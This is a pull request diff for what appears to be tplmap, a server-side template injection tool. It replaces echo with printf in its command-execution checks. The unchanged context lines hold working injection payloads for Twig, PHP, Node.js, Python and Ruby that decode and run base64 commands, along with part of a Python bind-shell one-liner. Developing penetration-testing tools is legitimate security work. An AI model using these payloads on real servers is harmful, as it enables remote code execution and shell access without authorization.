### PR TITLE
Use printf for bash execution checking

### DIFF
--- a/config.yml
+++ b/config.yml
@@ -2,7 +2,7 @@
 base_path: ~/.tplmap/
 
 # Log HTTP responses under tplmap.log
-log_response: False
+log_response: True
 
 # The number of seconds to delay the response when testing for
 # time-based blind injection. This will be added to the average

--- a/config.yml
+++ b/config.yml
@@ -2,7 +2,7 @@
 base_path: ~/.tplmap/
 
 # Log HTTP responses under tplmap.log
-log_response: True
+log_response: False
 
 # The number of seconds to delay the response when testing for
 # time-based blind injection. This will be added to the average

--- a/core/plugin.py
+++ b/core/plugin.py
@@ -86,7 +86,6 @@ class Plugin(object):
                 action_execute = self.actions.get('execute', {})
                 test_cmd_code = action_execute.get('test_cmd')
                 test_cmd_code_expected = action_execute.get('test_cmd_expected')
-
                 if (
                     test_cmd_code and 
                     test_cmd_code_expected and
@@ -695,7 +694,7 @@ class Plugin(object):
             suffix = suffix,
             blind = blind
         )
-        return result
+        return result.replace('\\n', '\n')
 
 
     def evaluate_blind(self, code, **kwargs):

--- a/core/plugin.py
+++ b/core/plugin.py
@@ -86,6 +86,7 @@ class Plugin(object):
                 action_execute = self.actions.get('execute', {})
                 test_cmd_code = action_execute.get('test_cmd')
                 test_cmd_code_expected = action_execute.get('test_cmd_expected')
+
                 if (
                     test_cmd_code and 
                     test_cmd_code_expected and

--- a/plugins/engines/dust.py
+++ b/plugins/engines/dust.py
@@ -27,7 +27,7 @@ class Dust(javascript.Javascript):
                 # execSync() has been introduced in node 0.11, so this will not work with old node versions.
                 # TODO: use another function.
                 'execute_blind': """require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i');""",
-                'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
+                'test_cmd': bash.printf % { 's1': rand.randstrings[2] },
                 'test_cmd_expected': rand.randstrings[2] 
             }
         })

--- a/plugins/engines/twig.py
+++ b/plugins/engines/twig.py
@@ -43,7 +43,7 @@ class Twig(php.Php):
             'execute' : {
                 'call': 'render',
                 'execute': """_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("bash -c '{eval,$({tr,/+,_-}<<<%(code_b64)s|{base64,--decode})}'")""",
-                'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
+                'test_cmd': bash.printf % { 's1': rand.randstrings[2] },
                 'test_cmd_expected': rand.randstrings[2] 
             },
             'execute_blind' : {

--- a/plugins/languages/bash.py
+++ b/plugins/languages/bash.py
@@ -1,5 +1,5 @@
 
-echo = """echo '%(s1)s'"""
+printf = """printf '%(s1)s'"""
 
 bind_shell = [
     """python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", %(port)s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("%(shell)s");s.close()'""",

--- a/plugins/languages/java.py
+++ b/plugins/languages/java.py
@@ -11,7 +11,7 @@ class Java(Plugin):
         self.update_actions({
         
             'execute' : {
-                'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
+                'test_cmd': bash.printf % { 's1': rand.randstrings[2] },
                 'test_cmd_expected': rand.randstrings[2],
                 'test_os' : """uname""",
                 'test_os_expected': '^[\w-]+$'

--- a/plugins/languages/javascript.py
+++ b/plugins/languages/javascript.py
@@ -61,7 +61,7 @@ class Javascript(Plugin):
             'execute' : {
                 'call': 'render',
                 'execute': """require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString())""",
-                'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
+                'test_cmd': bash.printf % { 's1': rand.randstrings[2] },
                 'test_cmd_expected': rand.randstrings[2] 
             },
             'bind_shell' : {

--- a/plugins/languages/php.py
+++ b/plugins/languages/php.py
@@ -48,7 +48,7 @@ class Php(Plugin):
             'execute' : {
                 'call': 'evaluate',
                 'execute': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d,'-_','+/'),strlen($d)%%4,'=',STR_PAD_RIGHT)));""",
-                'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
+                'test_cmd': bash.printf % { 's1': rand.randstrings[2] },
                 'test_cmd_expected': rand.randstrings[2] 
             },
             'blind' : {

--- a/plugins/languages/python.py
+++ b/plugins/languages/python.py
@@ -46,7 +46,7 @@ class Python(Plugin):
             'execute' : {
                 'call': 'evaluate',
                 'execute': """__import__('os').popen(__import__('base64').urlsafe_b64decode('%(code_b64)s').decode()).read()""",
-                'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
+                'test_cmd': bash.printf % { 's1': rand.randstrings[2] },
                 'test_cmd_expected': rand.randstrings[2] 
             },
             'blind' : {

--- a/plugins/languages/ruby.py
+++ b/plugins/languages/ruby.py
@@ -45,7 +45,7 @@ class Ruby(Plugin):
             'execute' : {
                 'call': 'evaluate',
                 'execute': """(require'base64';%%x(#{Base64.urlsafe_decode64('%(code_b64)s')})).to_s""",
-                'test_cmd': bash.echo % { 's1': rand.randstrings[2] },
+                'test_cmd': bash.printf % { 's1': rand.randstrings[2] },
                 'test_cmd_expected': rand.randstrings[2]
             },
             'blind' : {


### PR DESCRIPTION
Using `echo` can cause issues, particularly because it produces newlines, which may be further encoded into `"\\n"` by the server, neither of which the reflection check understands. I've further made plugin.execute() automatically convert `"\\n"` into newlines.